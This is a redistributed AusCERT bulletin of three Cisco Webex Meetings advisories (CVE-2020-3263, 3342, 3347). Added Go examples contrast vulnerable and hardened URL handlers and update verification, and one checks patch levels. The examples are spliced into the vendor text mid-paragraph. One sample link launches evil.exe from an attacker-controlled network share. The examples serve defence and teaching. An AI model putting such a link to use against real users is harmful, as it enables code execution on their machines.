-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2020.2116.4
                Cisco Webex Meetings Desktop App Vulnerabilities
                                12 August 2020

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           Cisco Webex Meetings Desktop App
Publisher:         Cisco Systems
Operating System:  Cisco
                   Windows
                   Mac OS
Impact/Access:     Execute Arbitrary Code/Commands -- Remote with User Interaction
                   Access Confidential Data        -- Existing Account
Resolution:        Patch/Upgrade
CVE Names:         CVE-2020-3347 CVE-2020-3342 CVE-2020-3263

Original Bulletin:
   https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-client-url-fcmpdfVY
   https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-client-mac-X7vp65BL
   https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-client-NBmqM9vt

Revision History:  August 12 2020: Updated fcmpdfVY to advisory v1.1
                   July   8 2020: Fixed Software section for NBmqM9vt updated
                   June  24 2020: Vendor provided information update to NBmqM9vt
                   June  18 2020: Initial Release

- --------------------------BEGIN INCLUDED TEXT--------------------

Cisco Webex Meetings Desktop App and Webex Meetings Client URL Filtering
Arbitrary Program Execution Vulnerability

Priority:        High
Advisory ID:     cisco-sa-webex-client-url-fcmpdfVY
First Published: 2020 June 17 16:00 GMT
Last Updated:    2020 August 11 16:29 GMT
Version 1.1:     Final
Workarounds:     No workarounds available
Cisco Bug IDs:   CSCvs52337
CVE-2020-3263    CWE-20
CVSS Score:      7.5  AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H/E:X/RL:X/RC:X

Summary

  o A vulnerability in Cisco Webex Meetings Desktop App and Cisco Webex
    Meetings Client could allow an unauthenticated, remote attacker to
    execute programs on an affected end-user system.

    The vulnerability is due to improper validation of input that is
    supplied to application URLs. The attacker could exploit this
    vulnerability by persuading a user to follow a malicious URL. A
    successful exploit could allow the attacker to cause the application to
    execute other programs that are already present on the end-user system.
    If malicious files are planted on the system or on an accessible network
    file path, the attacker could execute arbitrary code on the affected
    system.

    Cisco has released software updates that address this vulnerability.
    There are no workarounds that address this vulnerability.

    This advisory is available at the following link:
    https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-client-url-fcmpdfVY

Affected Products

  o Vulnerable Products

    This vulnerability affects Cisco Webex Meetings Desktop App and Cisco
    Webex Meetings Client releases earlier than Release 39.5.12.

    To determine which release of Cisco Webex Meetings Desktop App is
    installed on a system, see the Check the Cisco Webex Meetings Desktop
    App Version help article.

    Products Confirmed Not Vulnerable

    Only products listed in the Vulnerable Products section of this advisory
    are known to be affected by this vulnerability.

Workarounds

  o There are no workarounds that address this vulnerability.

Fixed Software

  o Cisco has released free software updates that address the vulnerability
    described in this advisory. Customers may only install and expect
    support for software versions and feature sets for which they have
    purchased a license. By installing, downloading, accessing, or otherwise
    using such software upgrades, customers agree to follow the terms of the
    Cisco software license:
    https://www.cisco.com/c/en/us/products/end-user-license-agreement.html

    Additionally, customers may only download software for which they have a
    valid license, procured from Cisco directly, or through a Cisco
    authorized reseller or partner.
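    The URL-handling weakness described in the Summary above is the usual
    CWE-20 shape for a custom URL scheme handler: the program to launch, or
    its arguments, is taken from the link itself, so a link can name a
    program already on the machine or a planted file on a reachable network
    path. The Go program below is an added illustration for this bulletin,
    not Cisco code, and not Webex's real scheme or handler; the
    example-meet:// scheme, the action allowlist and the install paths are
    assumptions. It places a handler that accepts an executable path from
    the query string beside one that maps an allowlisted action to a fixed
    program and only lets a restricted meeting ID through.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
	"strings"
)

// Hypothetical custom scheme registered by a meeting client. This is an
// assumption for the example, not the scheme used by Webex.
const scheme = "example-meet"

// Allowlisted actions, each bound to a fixed, fully qualified executable
// chosen at build time (paths are assumed). Nothing taken from the URL
// may name a program.
var allowedActions = map[string]string{
	"join":     `C:\Program Files\ExampleMeet\join.exe`,
	"schedule": `C:\Program Files\ExampleMeet\schedule.exe`,
}

// ErrRejected is returned for any URL the handler will not act on.
var ErrRejected = errors.New("url rejected")

// LaunchSpec is what the handler would hand to CreateProcess/exec.
type LaunchSpec struct {
	Program string
	Args    []string
}

// VulnerableHandler shows the CWE-20 pattern: the program and its arguments
// come straight from attacker-controlled query parameters, so a link such as
// example-meet://launch?exe=%5C%5Cattacker%5Cshare%5Cevil.exe would run a
// planted file from a UNC path with the user's privileges.
func VulnerableHandler(raw string) (LaunchSpec, error) {
	u, err := url.Parse(raw)
	if err != nil || u.Scheme != scheme {
		return LaunchSpec{}, ErrRejected
	}
	q := u.Query()
	return LaunchSpec{Program: q.Get("exe"), Args: q["arg"]}, nil
}

// HardenedHandler accepts only an allowlisted action (the URL host part) and
// a single "meeting" parameter drawn from a restricted character set. The
// executable path comes from the allowlist, never from the URL, so neither
// local programs nor network paths can be named by the link.
func HardenedHandler(raw string) (LaunchSpec, error) {
	u, err := url.Parse(raw)
	if err != nil || u.Scheme != scheme {
		return LaunchSpec{}, ErrRejected
	}
	program, ok := allowedActions[strings.ToLower(u.Host)]
	if !ok {
		return LaunchSpec{}, ErrRejected
	}
	q := u.Query()
	for key := range q {
		if key != "meeting" { // reject any parameter we did not expect
			return LaunchSpec{}, ErrRejected
		}
	}
	id := q.Get("meeting")
	if !validMeetingID(id) {
		return LaunchSpec{}, ErrRejected
	}
	return LaunchSpec{Program: program, Args: []string{"--meeting", id}}, nil
}

// validMeetingID allows 4-32 ASCII letters and digits: no separators, dots,
// colons or quoting characters can reach the launched process.
func validMeetingID(s string) bool {
	if len(s) < 4 || len(s) > 32 {
		return false
	}
	for _, r := range s {
		isDigit := r >= '0' && r <= '9'
		isAlpha := (r >= 'a' && r <= 'z') || (r >= 'A' && r <= 'Z')
		if !isDigit && !isAlpha {
			return false
		}
	}
	return true
}

func main() {
	// Constructed sample links: one legitimate, one pointing at a planted file.
	links := []string{
		"example-meet://join?meeting=abc123",
		"example-meet://launch?exe=%5C%5Cattacker%5Cshare%5Cevil.exe&arg=-silent",
	}
	for _, l := range links {
		v, verr := VulnerableHandler(l)
		h, herr := HardenedHandler(l)
		fmt.Printf("%s\n  vulnerable: %+v %v\n  hardened:   %+v %v\n", l, v, verr, h, herr)
	}
}
```

    The point of the hardened form is that the URL selects among fixed
    behaviours rather than describing one; once the link can carry a path,
    no amount of filtering of that path is as robust as never accepting it.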
    In most cases this will be a maintenance upgrade to software that was
    previously purchased. Free security software updates do not entitle
    customers to a new software license, additional software feature sets,
    or major revision upgrades.

    When considering software upgrades, customers are advised to regularly
    consult the advisories for Cisco products, which are available from the
    Cisco Security Advisories and Alerts page, to determine exposure and a
    complete upgrade solution.

    In all cases, customers should ensure that the devices to be upgraded
    contain sufficient memory and confirm that current hardware and software
    configurations will continue to be supported properly by the new
    release. If the information is not clear, customers are advised to
    contact the Cisco Technical Assistance Center (TAC) or their contracted
    maintenance providers.

    Customers Without Service Contracts

    Customers who purchase directly from Cisco but do not hold a Cisco
    service contract and customers who make purchases through third-party
    vendors but are unsuccessful in obtaining fixed software through their
    point of sale should obtain upgrades by contacting the Cisco TAC:
    https://www.cisco.com/c/en/us/support/web/tsd-cisco-worldwide-contacts.html

    Customers should have the product serial number available and be
    prepared to provide the URL of this advisory as evidence of entitlement
    to a free upgrade.

    Fixed Releases

    Cisco fixed this vulnerability in Cisco Webex Meetings Desktop App and
    Cisco Webex Meetings Client releases 40.1.0 and later. For lockdown
    versions of Cisco Webex Meetings Desktop App and Cisco Webex Meetings
    Client, Cisco fixed this vulnerability in releases 39.5.12 and later.

    Administrators can update the Cisco Webex Meetings Desktop App for their
    user bases by following the instructions in the IT Administrator Guide
    for Mass Deployment of the Cisco Webex Meetings Desktop App.

    Users can update the Cisco Webex Meetings Desktop App by following the
    instructions in the Update the Cisco Webex Meetings Desktop App article.

    Users can update the Cisco Webex Meetings Client by following the
    instructions in the Download the Webex Client article.

Exploitation and Public Announcements

  o The Cisco Product Security Incident Response Team (PSIRT) is not aware of
    any public announcements or malicious use of the vulnerability that is
    described in this advisory.

Source

  o This vulnerability was found during internal security testing.

Cisco Security Vulnerability Policy

  o To learn about Cisco security vulnerability disclosure policies and
    publications, see the Security Vulnerability Policy. This document also
    contains instructions for obtaining fixed software and receiving
    security vulnerability information from Cisco.

Action Links for This Advisory

  o Snort Rule 54358
    Snort Rule 54359
    Snort Rule 54360
    Snort Rule 54361
    Snort Rule 54362
    Snort Rule 54363
    Snort Rule 54364
    Snort Rule 54365
    Snort Rule 54366
    Snort Rule 54367
    Snort Rule 54368
    Snort Rule 54369
    Snort Rule 54370
    Snort Rule 54371
    Snort Rule 54372

URL

  o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-client-url-fcmpdfVY

Revision History

  o +---------+----------------------+-----------------+--------+-------------+
    | Version | Description          | Section         | Status | Date        |
    +---------+----------------------+-----------------+--------+-------------+
    |         | Updated the title    | Title, Summary, |        |             |
    | 1.1     | and several sections | Vulnerable      | Final  | 2020-AUG-11 |
    |         | to include Webex     | Products, and   |        |             |
    |         | Meetings Client.     | Fixed Software  |        |             |
    +---------+----------------------+-----------------+--------+-------------+
    | 1.0     | Initial public       | -               | Final  | 2020-JUN-17 |
    |         | release.             |                 |        |             |
    +---------+----------------------+-----------------+--------+-------------+

- --------------------------------------------------------------------------------

Cisco Webex Meetings Desktop App for Mac Update Feature Code Execution
Vulnerability

Priority:        High
Advisory ID:     cisco-sa-webex-client-mac-X7vp65BL
First Published: 2020 June 17 16:00 GMT
Version 1.0:     Final
Workarounds:     No workarounds available
Cisco Bug IDs:   CSCvq03838
CVE-2020-3342    CWE-295
CVSS Score:      8.8  AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:X/RL:X/RC:X

Summary

  o A vulnerability in the software update feature of Cisco Webex Meetings
    Desktop App for Mac could allow an unauthenticated, remote attacker to
    execute arbitrary code on an affected system.

    The vulnerability is due to improper validation of cryptographic
    protections on files that are downloaded by the application as part of a
    software update. An attacker could exploit this vulnerability by
    persuading a user to go to a website that returns files to the client
    that are similar to files that are returned from a valid Webex website.
    The client may fail to properly validate the cryptographic protections
    of the provided files before executing them as part of an update. A
    successful exploit could allow the attacker to execute arbitrary code on
    the affected system with the privileges of the user.

    Cisco has released software updates that address this vulnerability.
    There are no workarounds that address this vulnerability.

    This advisory is available at the following link:
    https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-client-mac-X7vp65BL

Affected Products

  o Vulnerable Products

    This vulnerability affects lockdown versions of Cisco Webex Meetings
    Desktop App for Mac earlier than Release 39.5.11.

    To determine which release of Cisco Webex Meetings Client for Mac is
    installed on a system, see the Check the Cisco Webex Meetings Desktop
    App Version help article.
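    The update-feature weakness above (CWE-295) comes down to one decision:
    whether the client executes whatever a server hands it, or only what a
    key pinned into the client vouches for. The Go program below is an added
    example for this bulletin, not Cisco's updater and not a description of
    how the Webex client verifies updates; the package layout (payload, a
    text manifest carrying the payload digest, an Ed25519 signature over the
    manifest) and the pinned-key scheme are assumptions. It shows an updater
    that only checks the package is self-consistent, which a look-alike site
    can satisfy, beside one that first checks the manifest signature against
    the pinned vendor key and then binds the payload to the signed digest.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
	"strings"
)

// UpdatePackage is what an update endpoint returns to the client: the
// installer bytes, a small text manifest, and a signature over the manifest.
// An impostor site can return all three; only the signature ties the
// package to the vendor.
type UpdatePackage struct {
	Payload   []byte
	Manifest  string // lines of key=value, e.g. "version=40.1.0\nsha256=<hex>"
	Signature []byte // ed25519 signature over Manifest
}

var ErrUntrustedUpdate = errors.New("update rejected: cryptographic verification failed")

// GenerateKeyPair returns an ed25519 key pair; the vendor keeps the private
// key and pins the public key into the client build.
func GenerateKeyPair() (ed25519.PublicKey, ed25519.PrivateKey) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	return pub, priv
}

// BuildPackage is the signing side: whoever holds priv (vendor or attacker)
// produces a self-consistent package for payload.
func BuildPackage(priv ed25519.PrivateKey, payload []byte, version string) UpdatePackage {
	sum := sha256.Sum256(payload)
	manifest := "version=" + version + "\nsha256=" + hex.EncodeToString(sum[:]) + "\n"
	return UpdatePackage{Payload: payload, Manifest: manifest, Signature: ed25519.Sign(priv, []byte(manifest))}
}

// manifestDigest extracts the sha256 value from the manifest, "" if absent.
func manifestDigest(manifest string) string {
	for _, line := range strings.Split(manifest, "\n") {
		if strings.HasPrefix(line, "sha256=") {
			return strings.TrimPrefix(line, "sha256=")
		}
	}
	return ""
}

// VulnerableAccept mirrors the advisory's failure mode: it checks that the
// package is internally consistent (digest matches payload) but never checks
// who signed the manifest, so anything a look-alike site serves passes.
func VulnerableAccept(pkg UpdatePackage) error {
	sum := sha256.Sum256(pkg.Payload)
	if manifestDigest(pkg.Manifest) != hex.EncodeToString(sum[:]) {
		return ErrUntrustedUpdate
	}
	return nil // a real updater would now execute pkg.Payload
}

// Verifier holds the vendor public key pinned at build time.
type Verifier struct{ Pinned ed25519.PublicKey }

// Accept verifies the manifest signature against the pinned key first, then
// binds the payload to the signed digest. Both checks must pass before the
// payload may be executed; where the download came from is never trusted.
func (v Verifier) Accept(pkg UpdatePackage) error {
	if len(v.Pinned) != ed25519.PublicKeySize { // ed25519.Verify panics on a bad key size
		return ErrUntrustedUpdate
	}
	if !ed25519.Verify(v.Pinned, []byte(pkg.Manifest), pkg.Signature) {
		return ErrUntrustedUpdate
	}
	sum := sha256.Sum256(pkg.Payload)
	if manifestDigest(pkg.Manifest) != hex.EncodeToString(sum[:]) {
		return ErrUntrustedUpdate
	}
	return nil
}

func main() {
	vendorPub, vendorPriv := GenerateKeyPair()
	_, attackerPriv := GenerateKeyPair()
	client := Verifier{Pinned: vendorPub}
	// Constructed payloads standing in for installer bytes.
	genuine := BuildPackage(vendorPriv, []byte("constructed: genuine installer bytes"), "40.1.0")
	forged := BuildPackage(attackerPriv, []byte("constructed: attacker installer bytes"), "40.1.0")
	fmt.Println("genuine, vulnerable client:", VulnerableAccept(genuine))
	fmt.Println("forged,  vulnerable client:", VulnerableAccept(forged))
	fmt.Println("genuine, hardened client: ", client.Accept(genuine))
	fmt.Println("forged,  hardened client: ", client.Accept(forged))
}
```

    Signing the manifest rather than the raw payload is a convenience for
    large installers; the security property is unchanged as long as the
    payload digest is inside the signed data and is checked before anything
    is executed.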
    Products Confirmed Not Vulnerable

    Only products listed in the Vulnerable Products section of this advisory
    are known to be affected by this vulnerability.

    Cisco Webex Meetings Desktop App for Windows is not affected by this
    vulnerability.

Workarounds

  o There are no workarounds that address this vulnerability.

Fixed Software

  o Cisco has released free software updates that address the vulnerability
    described in this advisory. Customers may only install and expect
    support for software versions and feature sets for which they have
    purchased a license. By installing, downloading, accessing, or otherwise
    using such software upgrades, customers agree to follow the terms of the
    Cisco software license:
    https://www.cisco.com/c/en/us/products/end-user-license-agreement.html

    Additionally, customers may only download software for which they have a
    valid license, procured from Cisco directly, or through a Cisco
    authorized reseller or partner. In most cases this will be a maintenance
    upgrade to software that was previously purchased. Free security
    software updates do not entitle customers to a new software license,
    additional software feature sets, or major revision upgrades.

    When considering software upgrades, customers are advised to regularly
    consult the advisories for Cisco products, which are available from the
    Cisco Security Advisories and Alerts page, to determine exposure and a
    complete upgrade solution.

    In all cases, customers should ensure that the devices to be upgraded
    contain sufficient memory and confirm that current hardware and software
    configurations will continue to be supported properly by the new
    release. If the information is not clear, customers are advised to
    contact the Cisco Technical Assistance Center (TAC) or their contracted
    maintenance providers.

    Customers Without Service Contracts

    Customers who purchase directly from Cisco but do not hold a Cisco
    service contract and customers who make purchases through third-party
    vendors but are unsuccessful in obtaining fixed software through their
    point of sale should obtain upgrades by contacting the Cisco TAC:
    https://www.cisco.com/c/en/us/support/web/tsd-cisco-worldwide-contacts.html

    Customers should have the product serial number available and be
    prepared to provide the URL of this advisory as evidence of entitlement
    to a free upgrade.

    Fixed Releases

    Cisco fixed this vulnerability in lockdown versions of Cisco Webex
    Meetings Desktop App for Mac releases 39.5.11 and later.

    Administrators can update the Cisco Webex Meetings Desktop App for their
    user bases by following the instructions available in the IT
    Administrator Guide for Mass Deployment of the Cisco Webex Meetings
    Desktop App.

    Users can update the Cisco Webex Meetings Desktop App by following the
    instructions in the Update the Cisco Webex Meetings Desktop App article.

Exploitation and Public Announcements

  o The Cisco Product Security Incident Response Team (PSIRT) is not aware of
    any public announcements or malicious use of the vulnerability that is
    described in this advisory.

Source

  o This vulnerability was found by Nick Mooney of Cisco Duo Security Labs
    during internal security testing.

Cisco Security Vulnerability Policy

  o To learn about Cisco security vulnerability disclosure policies and
    publications, see the Security Vulnerability Policy. This document also
    contains instructions for obtaining fixed software and receiving
    security vulnerability information from Cisco.

URL

  o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-client-mac-X7vp65BL

Revision History

  o +----------+---------------------------+----------+--------+--------------+
    | Version  | Description               | Section  | Status | Date         |
    +----------+---------------------------+----------+--------+--------------+
    | 1.0      | Initial public release.   | -        | Final  | 2020-JUN-17  |
    +----------+---------------------------+----------+--------+--------------+

- --------------------------------------------------------------------------------

Cisco Webex Meetings Desktop App for Windows Shared Memory Information
Disclosure Vulnerability

Priority:        Medium
Advisory ID:     cisco-sa-webex-client-NBmqM9vt
First Published: 2020 June 17 16:00 GMT
Last Updated:    2020 July 7 14:28 GMT
Version 1.3:     Final
Workarounds:     No workarounds available
Cisco Bug IDs:   CSCvt99384
CVE-2020-3347    CWE-200
CVSS Score:      5.5  AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:X/RL:X/RC:X

Summary

  o A vulnerability in Cisco Webex Meetings Desktop App for Windows could
    allow an authenticated, local attacker to gain access to sensitive
    information on an affected system.

    The vulnerability is due to unsafe usage of shared memory that is used
    by the affected software. An attacker with permissions to view system
    memory could exploit this vulnerability by running an application on
    the local system that is designed to read shared memory. A successful
    exploit could allow the attacker to retrieve sensitive information from
    the shared memory, including usernames, meeting information, or
    authentication tokens that could aid the attacker in future attacks.

    Cisco has released software updates that address this vulnerability.
    There are no workarounds that address this vulnerability.

    This advisory is available at the following link:
    https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-client-NBmqM9vt

Affected Products

  o Vulnerable Products

    At the time of publication, this vulnerability affected Cisco Webex
    Meetings Desktop App for Windows releases earlier than 40.4.12 and
    40.6.0.

    See the Details section in the bug ID(s) at the top of this advisory for
    the most complete and current information.

    Products Confirmed Not Vulnerable

    Only products listed in the Vulnerable Products section of this advisory
    are known to be affected by this vulnerability.

Details

  o Cisco Webex Meetings Desktop App uses shared memory to exchange
    information with the Windows operating system and other applications.
    The software may store sensitive information (such as usernames, meeting
    information, and authentication tokens) in this shared memory space.
    Other users on the local system could retrieve this information from
    within the shared memory space and use it for additional attacks.

Workarounds

  o There are no workarounds that address this vulnerability.

Fixed Software

  o When considering software upgrades, customers are advised to regularly
    consult the advisories for Cisco products, which are available from the
    Cisco Security Advisories and Alerts page, to determine exposure and a
    complete upgrade solution.

    In all cases, customers should ensure that the devices to be upgraded
    contain sufficient memory and confirm that current hardware and software
    configurations will continue to be supported properly by the new
    release. If the information is not clear, customers are advised to
    contact the Cisco Technical Assistance Center (TAC) or their contracted
    maintenance providers.
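    For triage across the three advisories in this bulletin, the check a
    practitioner wants is one that takes the installed Desktop App release
    (found as described in the Check the Cisco Webex Meetings Desktop App
    Version article) and reports which of the three CVEs it has not received
    a fix for. The Go program below is an added example, not a Cisco tool;
    it encodes the fixed releases stated in the three advisories (40.1.0, or
    39.5.12 for lockdown builds, for CVE-2020-3263; 39.5.11 for Mac lockdown
    builds for CVE-2020-3342; 40.4.12 and 40.6.0, or 39.5.26 for lockdown
    builds, for CVE-2020-3347). Two conservative readings are assumptions of
    this example: a mainline build below 40.1.0 is treated as unpatched for
    CVE-2020-3263 because no earlier mainline fix is listed, and a 40.5.x
    build is treated as unpatched for CVE-2020-3347 because fixes are listed
    only for the 40.4 and 40.6 trains. Cisco Webex Meetings Server, which is
    versioned differently, is not covered.

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// version is major.minor.patch; missing components are treated as 0.
type version [3]int

func parseVersion(s string) (version, error) {
	var v version
	parts := strings.Split(strings.TrimSpace(s), ".")
	if len(parts) == 0 || len(parts) > 3 {
		return v, fmt.Errorf("bad version %q", s)
	}
	for i, p := range parts {
		n, err := strconv.Atoi(p)
		if err != nil || n < 0 {
			return v, fmt.Errorf("bad version %q", s)
		}
		v[i] = n
	}
	return v, nil
}

// less reports whether a is older than b.
func less(a, b version) bool {
	for i := 0; i < 3; i++ {
		if a[i] != b[i] {
			return a[i] < b[i]
		}
	}
	return false
}

// Unpatched returns the CVEs from this bulletin that the given Desktop App
// build has not received a fix for. platform is "windows" or "mac";
// lockdown marks the lockdown (39.5.x) release line, which has its own
// fix versions in every advisory above.
func Unpatched(platform, installed string, lockdown bool) ([]string, error) {
	v, err := parseVersion(installed)
	if err != nil {
		return nil, err
	}
	platform = strings.ToLower(platform)
	if platform != "windows" && platform != "mac" {
		return nil, fmt.Errorf("unknown platform %q", platform)
	}
	var cves []string

	// CVE-2020-3263 (URL filtering, Windows and Mac): fixed in 40.1.0,
	// lockdown fixed in 39.5.12. Assumption: any mainline build below
	// 40.1.0 is treated as unpatched since no earlier fix is listed.
	if (lockdown && less(v, version{39, 5, 12})) || (!lockdown && less(v, version{40, 1, 0})) {
		cves = append(cves, "CVE-2020-3263")
	}

	// CVE-2020-3342 (Mac update feature): only lockdown Mac builds below
	// 39.5.11; Windows is not affected.
	if platform == "mac" && lockdown && less(v, version{39, 5, 11}) {
		cves = append(cves, "CVE-2020-3342")
	}

	// CVE-2020-3347 (Windows shared memory): fixed in 40.4.12 and 40.6.0,
	// lockdown fixed in 39.5.26. Assumption: 40.5.x has no listed fix and
	// is therefore treated as unpatched.
	if platform == "windows" {
		switch {
		case lockdown && less(v, version{39, 5, 26}):
			cves = append(cves, "CVE-2020-3347")
		case !lockdown && (less(v, version{40, 4, 12}) || (v[0] == 40 && v[1] == 5)):
			cves = append(cves, "CVE-2020-3347")
		}
	}
	return cves, nil
}

func main() {
	// Constructed sample inventory, not real hosts.
	inventory := []struct {
		host, platform, ver string
		lockdown            bool
	}{
		{"win-01", "windows", "40.6.1", false},
		{"win-02", "windows", "40.4.11", false},
		{"win-03", "windows", "39.5.25", true},
		{"mac-01", "mac", "39.5.10", true},
	}
	for _, h := range inventory {
		cves, err := Unpatched(h.platform, h.ver, h.lockdown)
		if err != nil {
			fmt.Println(h.host, "error:", err)
			continue
		}
		fmt.Printf("%-7s %-8s %-8s lockdown=%-5v unpatched=%v\n", h.host, h.platform, h.ver, h.lockdown, cves)
	}
}
```

    Whether a given install is on the lockdown line is not derivable from
    the version number alone with certainty, so the example takes it as an
    input; an inventory source that records the deployment channel should
    supply it.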
    Fixed Releases

    At the time of publication, the following releases contained the fix for
    this vulnerability:

    +--------------------------------------+------------------------------------+
    | Cisco Webex Product                  | Fixed Release                      |
    +--------------------------------------+------------------------------------+
    | Cisco Webex Meetings Desktop App for | 40.4.12 and later                  |
    | Windows                              | 40.6.0 and later                   |
    +--------------------------------------+------------------------------------+
    | Cisco Webex Meetings Desktop App for | 39.5.26 and later                  |
    | Windows, lockdown versions           |                                    |
    +--------------------------------------+------------------------------------+
    | Cisco Webex Meetings Server          | 3.0 MR3 Security Patch 3 and later |
    |                                      | 4.0 MR3 Security Patch 2 and later |
    +--------------------------------------+------------------------------------+

    See the Details section in the bug ID(s) at the top of this advisory for
    the most complete and current information.

Exploitation and Public Announcements

  o The Cisco Product Security Incident Response Team (PSIRT) is aware that
    proof-of-concept exploit code is available for the vulnerability that is
    described in this advisory.

    The Cisco PSIRT is not aware of any malicious use of the vulnerability
    that is described in this advisory.

Source

  o Cisco would like to thank Martin Rakhmanov of Trustwave for reporting
    this vulnerability.

Cisco Security Vulnerability Policy

  o To learn about Cisco security vulnerability disclosure policies and
    publications, see the Security Vulnerability Policy. This document also
    contains instructions for obtaining fixed software and receiving
    security vulnerability information from Cisco.

URL

  o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-client-NBmqM9vt

Revision History

  o +---------+---------------------------+------------+--------+-------------+
    | Version | Description               | Section    | Status | Date        |
    +---------+---------------------------+------------+--------+-------------+
    |         | Added update information  | Fixed      |        |             |
    | 1.3     | for Cisco Webex Meetings  | Software   | Final  | 2020-JUL-07 |
    |         | Server.                   |            |        |             |
    +---------+---------------------------+------------+--------+-------------+
    |         | Included additional fix   | Vulnerable |        |             |
    | 1.2     | information for the Cisco | Products,  | Final  | 2020-JUN-23 |
    |         | Webex Desktop App release | Fixed      |        |             |
    |         | 40.4.12.                  | Software   |        |             |
    +---------+---------------------------+------------+--------+-------------+
    |         | Clarified affected        |            |        |             |
    | 1.1     | versions of Cisco Webex   | Affected   | Final  | 2020-JUN-17 |
    |         | Meetings Desktop App for  | Products   |        |             |
    |         | Windows.                  |            |        |             |
    +---------+---------------------------+------------+--------+-------------+
    | 1.0     | Initial public release.   | -          | Final  | 2020-JUN-17 |
    +---------+---------------------------+------------+--------+-------------+

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for
consequences which may arise from following or acting on information or
advice contained in this security bulletin.

NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBXzN4tONLKJtyKPYoAQiWTg/7B0Uj6N2axXOODz3F7gHucCj/BqaSnWpo
iTdkrVcnlRiopTEavhew+t9uTVOi/QvTlyhJmI1TCg/KgVEvratqwHBRJfSuP6zX
NzKPRjsaZDAd0IMLw1bw+zwas67NTAV0e91UCCgv+SWN2typFa+aHqeVS7QneRAJ
T0an/+c9jFxE/cR/aT4v0xlrOPa+ub3EKIYr/X6GwirvvvbdKwGX4p5pwT3Coh/1
GeY9Sc+BbYx0OgoBNF/R75HboZHNUoxl28PvpXlfxY4YMYG4B98PXPAuTuIfoc8s
efUpqTRuu9pueBuH4T7t/SriY8tnU0Ckwie9gjM1zF7C0NndkEhXkfXuHO8z7BI7
mguvnpPg1gIfDaX6sED2H0QTfLZS5hGJWfMB8HbtSj6s/5pMiuPgsYlGuhnBiTrN
UYKOXsudrYJrfcKX6bIpjCdCP8uN3hGdqulR8kME9Isu6BEr/Pv2b2CRQlUc9Odh
YXvP3PP42/esHS2NB2uCAOwoRdbFpi83lxst+5vZspa/2LTQkyaQMvExxoKY0QzD
xEH+MaRgAPr4QXEMdQ0fZVYm9fGbbUliXPkf31CnVGBU7/6ZUSUjmg6q0GNRbaLu
PQ/louh1K737Hyoy8L5es8XtH0FYqWQGWYR+hoc3opawi9dN6czMiB3ySjzxq53Q
NzPhfIFs7mM=
=bahe
-----END PGP SIGNATURE-----